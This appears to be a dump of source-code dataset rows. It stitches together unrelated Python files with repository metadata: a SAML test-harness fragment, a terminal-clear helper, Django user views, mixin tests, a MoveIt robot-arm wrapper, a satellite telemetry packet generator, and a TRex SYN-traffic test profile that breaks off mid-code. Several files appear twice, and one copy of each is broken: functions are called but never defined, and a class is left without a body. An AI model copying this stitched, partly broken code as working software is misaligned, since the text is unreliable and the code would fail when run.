        self.sso_args = sso_args
        self.policy = policy
        self.acs_handler = {}
        # The '' key is the default SP and runs the 'base' EC test; every
        # other key runs the EC test named after it.
        for key, _sso in self.sso.items():
            if key == '':
                self.acs_handler[key] = ACS(_sso.sp, cache=self.cache,
                                            lookup=self.lookup,
                                            res_db=self.res_db,
                                            policy=self.policy, ec_test='base')
            else:
                self.acs_handler[key] = ACS(_sso.sp, cache=self.cache,
                                            lookup=self.lookup,
                                            res_db=self.res_db,
                                            policy=self.policy, ec_test=key)
    def _cp_dispatch(self, vpath):
        """Route acs/<ec>/{post,redirect} URLs to the matching ACS handler.

        Pops the consumed path segments off ``vpath`` and stores the SAML
        binding in the request params; everything else is dispatched to
        this object's exposed methods.
        """
        # Only get here if vpath != None
        ent = cherrypy.request.remote.ip
        logger.info('ent:{}, vpath: {}'.format(ent, vpath))
        if vpath[0] == 'static':
            return self
        if len(vpath) >= 2:
            # acs/<ec>/post or acs/<ec>/redirect
            if vpath[0] == 'acs':
                # if cherrypy.request.method == 'POST':
                #     if cherrypy.request.process_request_body is True:
                #         try:
                #             _response = as_unicode(cherrypy.request.body.read())
                #         except ValueError:
                #             raise ValueError('No body')
                #         else:
                #             cherrypy.request.params['response'] = _response
                #     else:
                #         cherrypy.request.params['response'] = ''
                vpath.pop(0)  # remove the 'acs'
                if vpath[0] in ['post', 'redirect']:
                    # No EC segment: default handler ('') with this binding.
                    ec = ''
                    cherrypy.request.params['binding'] = BINDING_MAP[vpath[0]]
                    vpath.pop(0)
                else:
                    ec = vpath.pop(0)
                    if vpath[0] in ['post', 'redirect']:
                        cherrypy.request.params['binding'] = BINDING_MAP[
                            vpath[0]]
                        vpath.pop(0)
                    else:
                        raise UnSupported('binding: ')
                return self.acs_handler[ec]
        return self
    @cherrypy.expose
    def test(self, **kwargs):
        """Render the test page listing the EC sequence and info."""
        resp = Response(mako_template="test.mako",
                        template_lookup=self.lookup,
                        headers=[])
        str_ec_seq = []
        for ec in self.ec_sequence:
            str_ec_seq.append(str(ec))
        argv = {
            # "ec_seq_json": json.dumps(EC_SEQUENCE),
            "ec_seq": str_ec_seq,
            "ec_info": self.ec_information
        }
        return conv_response(resp, **argv)
    @cherrypy.expose
    def overview(self, **kwargs):
        """Render the results-overview page; data is passed as JSON strings."""
        resp = Response(mako_template="test_overview.mako",
                        template_lookup=self.lookup,
                        headers=[])
        str_ec_seq = []
        for ec in self.ec_sequence:
            str_ec_seq.append(str(ec))
        argv = {
            # "ec_seq_json": json.dumps(EC_SEQUENCE),
            "ec_seq": json.dumps(str_ec_seq),
            "ec_info": json.dumps(self.ec_information),
            "test_results": json.dumps(self.res_db.get_overview_data())
        }
        return conv_response(resp, **argv)
    @cherrypy.expose
    def disco(self, **kwargs):
        """IdP discovery-service endpoint: redirect to the chosen IdP.

        Looks up the original request via the outstanding query ``sid`` and
        remembers the chosen entityID in a 've_disco' cookie.
        """
        entity_id = kwargs["entityID"]
        sid = kwargs["sid"]
        came_from = self.cache.outstanding_queries[sid]
        _sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
        resp = _sso._redirect_to_auth(_sso.sp, entity_id, came_from)
        # Add cookie
        kaka = make_cookie("ve_disco", entity_id, "SEED_SAW")
        resp.headers.append(kaka)
        return conv_response(resp)
    @cherrypy.expose
    def login(self):
        """Start a login against the default ('') SP."""
        _sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
        return _sso.index()
    @cherrypy.expose
    def ecat(self, **kwargs):
        """Start an EC test login; kwargs['c'] names the test ('base' = default SP)."""
        if kwargs['c'] == 'base':
            _sso = SSO(self.sp[''], cache=self.cache, **self.sso_args)
        else:
            _sso = SSO(self.sp[kwargs['c']], cache=self.cache, **self.sso_args)
        return _sso.index('ecat')
| 4,376 | 292 | 23 |
53b07645beb6a37bb39e8fb6d9e458b88789c6b6 | 770 | py | Python | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | gamemacros.py | GameTL/GameMacros | b573c0fbabc332873f2030728a5f9d52f64e0856 | [
"MIT"
] | null | null | null | # Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
platform = platform.system()
if platform == 'Darwin': # for Unix (MacOS, Linux)
text = "clear"
elif platform == 'Windows': # for Windows
text = 'cls'
if __name__ == '__main__':
input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
from clearterminal import * -----> clear()
import clearterminal -----> clearterminal.clear()''')
clear()
| 23.333333 | 59 | 0.68961 | # Version 3.0 - 2021 September 10
# work for both Mac, Windows, Linux
# use clear() for clearing terminal
# Method 1
# from clearterminal import * -----> clear()
# Method 2
# import clearterminal -----> clearterminal.clear()
import os
import platform
platform = platform.system()  # e.g. 'Darwin', 'Linux', 'Windows'
# Pick the shell command used to clear the screen. The original set `text`
# only for 'Darwin' and 'Windows', so on Linux `clear()` raised NameError
# even though the header comments promise Linux support. Every non-Windows
# platform uses the Unix 'clear' command.
if platform == 'Windows':  # for Windows
    text = 'cls'
else:  # for Unix-likes (macOS/Darwin, Linux)
    text = "clear"

def clear():
    """Clear the terminal by running the platform's clear-screen command."""
    os.system(text)

if __name__ == '__main__':
    input('''This is the terminal output
This is the terminal output
This is the terminal output
This is the terminal output
Press Enter to excute the clear() function for the terminal
    from clearterminal import * -----> clear()
    import clearterminal -----> clearterminal.clear()''')
    clear()
| 11 | 0 | 23 |
73c231f843e281f5793ac6d65c263fc1d0984a82 | 2,629 | py | Python | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | tovp/users/views.py | nrsimha/tovp | 311bc957c95c294811d737f5df30b0a218d35610 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
user_logged_in.connect(logged_in_message)
user_logged_out.connect(logged_out_message)
| 31.674699 | 83 | 0.732218 | # -*- coding: utf-8 -*-
# Import the reverse lookup function
from django.core.urlresolvers import reverse
# view imports
from django.views.generic import DetailView
from django.views.generic import RedirectView
from django.views.generic import UpdateView
from django.views.generic import ListView
# Will be used for logged in and logged out messages
from django.contrib import messages
from django.contrib.auth.signals import user_logged_in, user_logged_out
# Only authenticated users can access views using this.
from braces.views import LoginRequiredMixin
# Import the form from users/forms.py
from .forms import UserUpdateForm
# Import the customized User model
from .models import User
class UserDetailView(LoginRequiredMixin, DetailView):
    """Read-only profile page for a single user, looked up by username."""
    template_name = 'users/user_detail.html'
    model = User
    # These next two lines tell the view to index lookups by username
    slug_field = "username"
    slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
    """Redirect the logged-in user to their own detail page."""
    permanent = False
    def get_redirect_url(self):
        """Return the URL of the requesting user's detail page."""
        return reverse("users:detail",
                       kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
    """Let the logged-in user edit their own account settings."""
    form_class = UserUpdateForm
    model = User
    template_name = 'users/user_update.html'
    # send the user back to their own page after a successful update
    def get_success_url(self):
        """Success redirect target (the user's own redirect view)."""
        return reverse("users:redirect")
    def get_object(self):
        """Always edit the requesting user's record, never another user's."""
        # Only get the User record for the user making the request
        return User.objects.get(username=self.request.user.username)
    def form_valid(self, form):
        """Apply an optional password change, flash a message, then save."""
        # Sets new password if user defined one
        if form.cleaned_data['password1']:
            form.instance.set_password(form.cleaned_data['password1'])
        messages.success(self.request, 'Your Account Settings has been saved.')
        return super(UserUpdateView, self).form_valid(form)
class UserListView(LoginRequiredMixin, ListView):
    """List all users; requires login."""
    model = User
    # These next two lines tell the view to index lookups by username
    slug_field = "username"
    slug_url_kwarg = "username"
def logged_in_message(sender, user, request, **kwargs):
    """Flash a welcome message on login (connected to user_logged_in below)."""
    messages.success(
        request,
        "Welcome, %s! You have been successfully logged in." % user.display_name,
        fail_silently=True)
user_logged_in.connect(logged_in_message)
def logged_out_message(sender, user, request, **kwargs):
    """Flash a goodbye message on logout (connected to user_logged_out below)."""
    messages.success(request, "You have been successfully logged out.",
                     fail_silently=True)
user_logged_out.connect(logged_out_message)
| 942 | 760 | 138 |
e1a7bac7b331fd02cd759384caa0119eac149b9d | 696 | py | Python | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 4 | 2017-10-24T11:20:19.000Z | 2021-01-13T02:41:29.000Z | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 9 | 2019-03-01T06:14:39.000Z | 2021-01-18T23:48:42.000Z | should_be/tests/test_mixin_utils.py | jayvdb/should_be | afcc71a19fcd9aaf6e8f93f740fa71f6d7e74ce1 | [
"0BSD"
] | 3 | 2020-05-18T07:08:43.000Z | 2020-07-19T14:18:29.000Z | from should_be import core as sc
import unittest
| 26.769231 | 77 | 0.635057 | from should_be import core as sc
import unittest
class TestMixin(sc.BaseMixin):
    """Fixture mixin targeting ``object``; provides one assertion helper."""
    target_class = object
    def should_cheese(self):
        """Trivial helper that exercises should_follow(True)."""
        self.should_follow(True)
class TestMixinUtils(unittest.TestCase):
    """Exercise BaseMixin's mix() and mix_method() helpers."""
    def test_default_mix(self):
        # mix() should graft should_cheese onto the target class (object).
        TestMixin.mix()
        (object()).should_cheese()
    def test_static_mix_method(self):
        # mix_method(..., method_type='static') should attach a static method.
        sc.BaseMixin.mix_method(object, 'should_static', lambda: 3,
                                method_type='static')
        object.should_static()
    def test_class_mix_method(self):
        # mix_method(..., method_type='class') should attach a class method.
        sc.BaseMixin.mix_method(object, 'should_class', lambda cls: str(cls),
                                method_type='class')
        object.should_class()
| 438 | 81 | 126 |
5189a017d03f3a9e16de5ab89f9496ace97a2cf5 | 12,191 | py | Python | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 2 | 2021-08-12T18:45:27.000Z | 2021-12-27T04:28:37.000Z | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 11 | 2021-07-09T14:49:30.000Z | 2022-03-04T16:59:54.000Z | edge_scripts/robot_support.py | OSU-AIMS/tic-tac-toe | b213e2e16b95671f78a79fd9b8d6046c30cd0a54 | [
"Apache-2.0"
] | 1 | 2021-12-27T04:28:41.000Z | 2021-12-27T04:28:41.000Z | #!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
    """
    Convenience method for testing if a list of values are within a tolerance of their counterparts in another list
    @param: goal       A list of floats, a Pose or a PoseStamped
    @param: actual     A list of floats, a Pose or a PoseStamped
    @param: tolerance  A float
    @returns: bool
    """
    all_equal = True  # NOTE(review): never read — leftover from an earlier version
    if type(goal) is list:
        # Element-wise comparison; fail fast on the first out-of-tolerance pair.
        for index in range(len(goal)):
            if abs(actual[index] - goal[index]) > tolerance:
                return False
    elif type(goal) is geometry_msgs.msg.PoseStamped:
        # Unwrap the stamped poses and compare the underlying Pose messages.
        return all_close(goal.pose, actual.pose, tolerance)
    elif type(goal) is geometry_msgs.msg.Pose:
        # Flatten both poses to [x, y, z, qx, qy, qz, qw] lists and recurse.
        return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
    return True
class moveManipulator(object):
"""moveManipulator Class""" | 36.71988 | 120 | 0.703634 | #!/usr/bin/env python
### IMPORTS
#
# `moveit_commander` namespace allows Python MoveIt interfaces.
# Includes a `MoveGroupCommander`_, `PlanningSceneInterface`_, and `RobotCommander`_ class
#
# Additional imports allow used for support, ROS messages, and etc.
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi, radians
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from motoman_msgs.srv import ReadSingleIO, WriteSingleIO
## Quaternion Tools
from tf.transformations import euler_from_quaternion, quaternion_from_euler
## Maze Runner Specific
import csv
#####################################################
## SUPPORT CLASSES AND FUNCTIONS
##
def all_close(goal, actual, tolerance):
    """
    Test whether every value in ``actual`` is within ``tolerance`` of its
    counterpart in ``goal``.
    @param: goal       A list of floats, a Pose or a PoseStamped
    @param: actual     A list of floats, a Pose or a PoseStamped
    @param: tolerance  A float
    @returns: bool
    """
    # (removed an unused ``all_equal`` local left over from an earlier revision)
    if type(goal) is list:
        # Element-wise comparison; fail fast on the first out-of-tolerance pair.
        for index in range(len(goal)):
            if abs(actual[index] - goal[index]) > tolerance:
                return False
    elif type(goal) is geometry_msgs.msg.PoseStamped:
        # Unwrap the stamped poses and compare the underlying Pose messages.
        return all_close(goal.pose, actual.pose, tolerance)
    elif type(goal) is geometry_msgs.msg.Pose:
        # Flatten both poses to [x, y, z, qx, qy, qz, qw] lists and recurse.
        return all_close(pose_to_list(goal), pose_to_list(actual), tolerance)
    return True
class moveManipulator(object):
    """Convenience wrapper around MoveIt Commander for a single move group.

    Bundles planning, execution, gripper IO (Motoman Read/WriteSingleIO
    services) and planning-scene collision-object management.
    """
    def __init__(self, eef):
        """Initialize MoveIt Commander and a ROS node for group ``eef``."""
        super(moveManipulator, self).__init__()
        ## First initialize `moveit_commander`_ and a `rospy`_ node:
        moveit_commander.roscpp_initialize(sys.argv)
        rospy.init_node('node_moveManipulator', anonymous=True)
        # Setup Variables needed for Moveit_Commander
        self.object_name = ''
        self.robot = moveit_commander.RobotCommander()
        self.scene = moveit_commander.PlanningSceneInterface()
        self.group_name = eef  # CHANGE THIS TO MATCH YOUR ROBOT'S MOVEIT CONFIG!
        self.move_group = moveit_commander.MoveGroupCommander(self.group_name)
        self.display_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',
                                                            moveit_msgs.msg.DisplayTrajectory,
                                                            queue_size=20)
        self.planning_frame = self.move_group.get_planning_frame()
        self.eef_link = self.move_group.get_end_effector_link()
        self.group_names = self.robot.get_group_names()
    def set_vel(self,max_vel):
        """Set the max velocity scaling factor (0.0 <= max_vel <= 1.0)."""
        ## Wrapper for Moveit Commander's max_velocity
        ## Allowed range... 0.0 <= max_vel <= 1.0
        self.move_group.set_max_velocity_scaling_factor(max_vel)
    def set_accel(self,max_accel):
        """Set the max acceleration scaling factor (0.0 <= max_accel <= 1.0)."""
        ## Wrapper for Moveit Commander's max_acceleration
        ## Allowed range... 0.0 <= max_vel <= 1.0
        self.move_group.set_max_acceleration_scaling_factor(max_accel)
    def lookup_pose(self):
        """Return the current end-effector Pose."""
        # Get Current Pose of the robot
        pose = self.move_group.get_current_pose(self.eef_link).pose
        #print(pose)
        #print(self.move_group.get_current_rpy(self.eef_link))
        return pose
    def goto_all_zeros(self):
        """Move all six joints to zero; returns True if within tolerance."""
        ## Go to "ALL-Zeros" position
        ## Get Current Position & Go to "All-Zeros" Position
        ## Trajectory Type: JOINT MOTION defined by joint position
        # Get Current Position
        joint_goal = self.move_group.get_current_joint_values()
        # Define "All-Zeros" Position
        joint_goal[0] = 0
        joint_goal[1] = 0
        joint_goal[2] = 0
        joint_goal[3] = 0
        joint_goal[4] = 0
        joint_goal[5] = 0
        # Send action to move-to defined position
        self.move_group.go(joint_goal, wait=True)
        # Calling ``stop()`` ensures that there is no residual movement
        self.move_group.stop()
        # For testing:
        current_joints = self.move_group.get_current_joint_values()
        return all_close(joint_goal, current_joints, 0.01)
    def goto_named_target(self, target):
        """Move to a named target from the MoveIt SRDF (joint motion)."""
        ## Go to named "target" position
        ## Trajectory Type: JOINT MOTION defined by joint position
        # Send action to move-to defined position
        self.move_group.set_named_target(target)
        self.move_group.plan()
        self.move_group.go(wait=True)
        # Calling ``stop()`` ensures that there is no residual movement
        self.move_group.stop()
        # For testing:
        current_joints = self.move_group.get_current_joint_values()
        return all_close(target, current_joints, 0.01)
    def plan_cartesian_lineup_path(self, down):
        """Plan (not execute) a straight-line Z offset of ``down`` meters."""
        ## Plan Cartesian Path to throw object
        # Specify a list of waypoints
        waypoints = []
        # Example - Commented Out
        wpose = self.move_group.get_current_pose().pose
        wpose.position.z += down  # Move up (z)
        # Forward (x)
        waypoints.append(copy.deepcopy(wpose))
        # We want the Cartesian path to be interpolated at a resolution of 5 cm
        # which is why we will specify 0.05 as the eef_step in Cartesian
        # translation.  We will disable the jump threshold by setting it to 0.0,
        # ignoring the check for infeasible jumps in joint space, which is sufficient
        # for this tutorial.
        (plan, fraction) = self.move_group.compute_cartesian_path(
                                        waypoints,   # waypoints to follow
                                        0.05,        # eef_step
                                        0.0)         # jump_threshold
        # Note: We are just planning, not asking move_group to actually move the robot yet:
        return plan
    def goto_Quant_Orient(self,pose):
        """Move to a Cartesian pose.

        ``pose`` may be a geometry_msgs Pose, a 6-list [x,y,z,rx,ry,rz]
        (Euler, radians) or a 7-list [x,y,z,qx,qy,qz,qw] (quaternion).
        NOTE(review): for a 6-list the trailing ``else`` still overwrites
        pose_goal with the raw list — confirm that set_pose_target accepting
        a list is the intended path.
        """
        ## GOTO Pose Using Cartesian + Quaternion Pose
        # Get Current Orientation in Quanternion Format
        # http://docs.ros.org/en/api/geometry_msgs/html/msg/Pose.html
        #q_poseCurrent = self.move_group.get_current_pose().pose.orientation
        #print(q_poseCurrent)
        # Using Quaternion's for Angle
        # Conversion from Euler(rotx,roty,rotz) to Quaternion(x,y,z,w)
        # Euler Units: RADIANS
        # http://docs.ros.org/en/melodic/api/tf/html/python/transformations.html
        # http://wiki.ros.org/tf2/Tutorials/Quaternions
        # http://docs.ros.org/en/api/geometry_msgs/html/msg/Quaternion.html
        if isinstance(pose, list):
            pose_goal = geometry_msgs.msg.Pose()
            pose_goal.position.x = pose[0]
            pose_goal.position.y = pose[1]
            pose_goal.position.z = pose[2]
        # Convert Euler Orientation Request to Quanternion
        if isinstance(pose, list) and len(pose) == 6:
            # Assuming Euler-based Pose List
            q_orientGoal = quaternion_from_euler(pose[3],pose[4],pose[5],axes='sxyz')
            pose_goal.orientation.x = q_orientGoal[0]
            pose_goal.orientation.y = q_orientGoal[1]
            pose_goal.orientation.z = q_orientGoal[2]
            pose_goal.orientation.w = q_orientGoal[3]
        if isinstance(pose, list) and len(pose) == 7:
            # Assuming Quant-based Pose List
            q_orientGoal = pose[-4:]
            pose_goal.orientation.x = q_orientGoal[0]
            pose_goal.orientation.y = q_orientGoal[1]
            pose_goal.orientation.z = q_orientGoal[2]
            pose_goal.orientation.w = q_orientGoal[3]
        else:
            #Assuming type is already in message format
            pose_goal = pose
        self.move_group.set_pose_target(pose_goal)
        ## Call the planner to compute the plan and execute it.
        plan = self.move_group.go(wait=True)
        # Calling `stop()` ensures that there is no residual movement
        self.move_group.stop()
        # It is always good to clear your targets after planning with poses.
        # Note: there is no equivalent function for clear_joint_value_targets()
        self.move_group.clear_pose_targets()
        # For testing:
        current_pose = self.move_group.get_current_pose().pose
        #return all_close(pose_goal, current_pose, 0.01)
    def goto_joint_posn(self,joint_goal):
        """Move to an explicit list of joint positions (joint motion)."""
        ## Go to Joint Defined position
        ## Get Current Position & Go to "All-Zeros" Position
        ## Trajectory Type: JOINT MOTION defined by joint position
        # Send action to move-to defined position
        self.move_group.go(joint_goal, wait=True)
        # Calling ``stop()`` ensures that there is no residual movement
        self.move_group.stop()
        # For testing:
        current_joints = self.move_group.get_current_joint_values()
        return all_close(joint_goal, current_joints, 0.01)
    def send_io(self, request):
        """Open/close the gripper via Motoman single-IO services.

        Writes ``request`` to IO address 10010, then reads address 10011
        and returns its value (truthy = closed).
        """
        ## Wrapper for rosservice to open/close gripper using Read/Write IO
        # Wait for ros services to come up
        rospy.wait_for_service('read_single_io')
        rospy.wait_for_service('write_single_io')
        # Create Handle for Service Proxy's
        try:
            read_single_io = rospy.ServiceProxy('read_single_io', ReadSingleIO)
            write_single_io = rospy.ServiceProxy('write_single_io', WriteSingleIO)
        except rospy.ServiceException as e:
            print("Gripper IO Service Call failed: %s"%e)
        # Send 'Write' IO Message
        try:
            write_status = write_single_io(10010, request)
        except:
            print("An exception occured. Unable to write to Single IO.")
        # Call Read Service to check current position
        read_status = read_single_io(10011).value
        if read_status:
            print('Gripper is Closed')
        else:
            print('Gripper is Open')
        return read_status
    def execute_plan(self, plan):
        """Execute a previously computed plan (blocking)."""
        ## Execute a Plan
        ## Use execute if you would like the robot to follow a plan that has already been computed:
        self.move_group.execute(plan, wait=True)
    def add_object(self, timeout=4):
        """Add a small box collision object to the planning scene."""
        ## Add object Element to Collision Scene
        # Create object
        object_pose = geometry_msgs.msg.PoseStamped()
        object_pose.header.frame_id = 'base_link'
        object_pose.pose.orientation.w = 1.0
        object_pose.pose.position.y = 0.6
        object_pose.pose.position.z = 0.01
        self.object_name = "object"
        # Add object to scene
        self.scene.add_box(self.object_name, object_pose, size=(0.005, 0.005, 0.005))
        # Alternively, Use Mesh of Object. (mixed success with this. See moveit webpage)
        #self.scene.add_mesh(self.object_name, object_pose, filename="$(find object)/meshes/object-model.stl", size=(1,1,1))
        return self.wait_for_state_update(object_is_known=True, timeout=timeout)
    def attach_object(self, timeout=4):
        """Attach the collision object to the robot end effector."""
        ## Attaching object to the Robot
        grasping_group = 'bot_mh5l'
        touch_links = self.robot.get_link_names(group=grasping_group)
        # Attach object to Robot EEF
        self.scene.attach_box(self.eef_link, self.object_name, touch_links=touch_links)
        #self.scene.attach_mesh(self.eef_link, self.object_name, touch_links=touch_links)
        # We wait for the planning scene to update.
        return self.wait_for_state_update(object_is_attached=True, object_is_known=False, timeout=timeout)
    def detach_object(self, timeout=4):
        """Detach the collision object from the robot."""
        ## Detaching object from the Robot
        self.scene.remove_attached_object(self.eef_link, name=self.object_name)
        # Wait for the planning scene to update.
        return self.wait_for_state_update(object_is_known=True, object_is_attached=False, timeout=timeout)
    def remove_object(self, timeout=4):
        """Remove the collision object from the planning scene."""
        ## Removing Objects from the Planning Scene
        ## **Note:** The object must be detached before we can remove it from the world
        self.scene.remove_world_object(self.object_name)
    def wait_for_state_update(self, object_is_known=False, object_is_attached=False, timeout=4):
        """Poll the planning scene until the object reaches the expected state.

        Returns True when the attached/known flags match, False on timeout.
        """
        ## wait_for_scene_update
        ## This helps with collision planning.
        start = rospy.get_time()
        seconds = rospy.get_time()
        while (seconds - start < timeout) and not rospy.is_shutdown():
            # Test if the object is in attached objects
            attached_objects = self.scene.get_attached_objects([self.object_name])
            is_attached = len(attached_objects.keys()) > 0
            # Test if the object is in the scene.
            # Note that attaching the object will remove it from known_objects
            is_known = self.object_name in self.scene.get_known_object_names()
            # Test if we are in the expected state
            if (object_is_attached == is_attached) and (object_is_known == is_known):
                return True
            # Sleep so that we give other threads time on the processor
            rospy.sleep(0.1)
            seconds = rospy.get_time()
        # If we exited the while loop without returning then we timed out
        return False
b4d0c4319db41b600e68c367ddf3793d8cf65162 | 1,222 | py | Python | client/test/test_packet.py | estcube/telemetry-forwarding-client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | 3 | 2020-06-11T12:34:25.000Z | 2020-09-16T12:06:32.000Z | client/test/test_packet.py | estcube/telemetry-forwarding-client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | 57 | 2020-09-16T09:11:04.000Z | 2022-02-28T01:32:13.000Z | client/test/test_packet.py | estcube/Telemetry-Forwarding-Client | be659c8dd8e4bd26d1d1974d63f90acffd150e34 | [
"MIT"
] | null | null | null | from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
hk_packet = generate_icp()
for byte in hk_packet:
print('{:02x}'.format(byte).upper(), end="")
print()
target = Main.from_bytes(hk_packet)
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| 21.438596 | 55 | 0.711948 | from random import random
from hk_common import *
from hk_sp import *
from test_code_common import *
from test_code_eps import *
from test_code_aocs import *
from test_code_obc import *
from test_code_st import *
from test_code_sp import *
from test_code_pcom import *
from test_code_scom import *
from client.kaitai.main_kaitai import *
def generate_normal_beacon() -> bytearray:
    """Concatenate common, OBC and AOCS housekeeping data into one bytearray.

    Note: extends the ``common`` bytearray in place and returns it.
    """
    common = CommonData().createData()
    obc = ObcData().createData()
    aocs = AocsData().createData()
    hk_packet = common
    hk_packet.extend(obc)
    hk_packet.extend(aocs)
    return hk_packet
def generate_icp():
    """Wrap a normal beacon payload in an ICP frame and return the bytearray."""
    # The module imports ``from random import random``, which binds the
    # *function* random — so the original ``random.randint(...)`` raised
    # AttributeError at runtime. Import randint locally instead.
    from random import randint
    beacon_data = generate_normal_beacon()
    f = bytearray()
    f.append(0x01)
    f.append(0x04)
    # Single-byte payload length — assumes beacon < 256 bytes; TODO confirm.
    f.append(len(beacon_data))
    f.append(0xF7)
    f += randint(0, 16777214).to_bytes(3, "big")  # 3-byte random field
    f.append(0x03)  # TODO Mode: NOW
    f += beacon_data
    f.append(0x05)  # TODO CRC
    f.append(0x05)
    return f
# Build one ICP-framed beacon and hex-dump it for inspection.
hk_packet = generate_icp()
for byte in hk_packet:
    print('{:02x}'.format(byte).upper(), end="")
print()
# Re-parse the generated bytes with the Kaitai-generated Main parser.
target = Main.from_bytes(hk_packet)
# NOTE(review): the braces make each print emit a one-element *set*,
# e.g. "{1234}" — possibly meant to be f-strings; confirm intent.
print({target.common_data.uptime})
print({target.spec_data.obc.fmc_mram_temp})
print({target.spec_data.aocs.sun_y_intensity_loc4})
| 556 | 0 | 46 |
f5f32bf9fc9897c7d19c064ce63795ce31ac13eb | 415 | py | Python | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | 1 | 2020-09-15T07:29:18.000Z | 2020-09-15T07:29:18.000Z | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | null | null | null | daysxtractor/daysselector.py | sebMathieu/daysxtractor | 744b535fbdd1e9186edc0f7562ce3bd920855c05 | [
"MIT"
] | null | null | null | ##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
| 24.411765 | 64 | 0.722892 | ##@package daysselector
# @author Sebastien MATHIEU
from abc import ABCMeta, abstractmethod
## Abstract class of a day selector.
class DaysSelector(metaclass=ABCMeta):
    """Abstract base class of a day selector.

    Note: the original used the Python 2 ``__metaclass__`` attribute, which
    is silently ignored in Python 3; declaring the metaclass in the class
    header makes ``@abstractmethod`` actually enforced.
    """
    ## Select representative days from time series.
    # @param data Data with the time series.
    # @return Dictionary with the select days and their weights.
    @abstractmethod
    def selectDays(self, data):
        return None
| 26 | 235 | 22 |
0a3ebda6000b9985a6e8a6936744f41e409200aa | 1,516 | py | Python | scripts/automation/regression/stateless_tests/profiles/syn.py | timgates42/trex-core | efe94752fcb2d0734c83d4877afe92a3dbf8eccd | [
"Apache-2.0"
] | 956 | 2015-06-24T15:04:55.000Z | 2022-03-30T06:25:04.000Z | scripts/automation/regression/stateless_tests/profiles/syn.py | angelyouyou/trex-core | fddf78584cae285d9298ef23f9f5c8725e16911e | [
"Apache-2.0"
] | 782 | 2015-09-20T15:19:00.000Z | 2022-03-31T23:52:05.000Z | scripts/automation/regression/stateless_tests/profiles/syn.py | angelyouyou/trex-core | fddf78584cae285d9298ef23f9f5c8725e16911e | [
"Apache-2.0"
] | 429 | 2015-06-27T19:34:21.000Z | 2022-03-23T11:02:51.000Z | from trex.stl.api import *
| 35.255814 | 102 | 0.396438 | from trex.stl.api import *
class Prof():
    """TRex stateless profile: one continuous TCP SYN stream with randomized
    source IP and source port."""
    def get_streams(self, direction = 0, pkt_size = 64, **kwargs):
        """Return the SYN stream; ``pkt_size`` is the on-wire frame size."""
        size = pkt_size - 4; # HW will add 4 bytes ethernet FCS
        # TCP SYN
        base_pkt = Ether()/IP(dst="48.0.0.1")/TCP(dport=80,flags="S")
        # NOTE(review): pad is computed but never appended to the packet —
        # confirm whether padding to pkt_size was intended.
        pad = max(0, size - len(base_pkt)) * 'x'
        # vm: rewrite source IP and source port per packet, then fix checksum
        vm = STLScVmRaw( [ STLVmFlowVar(name="ip_src",
                                          min_value="16.0.0.0",
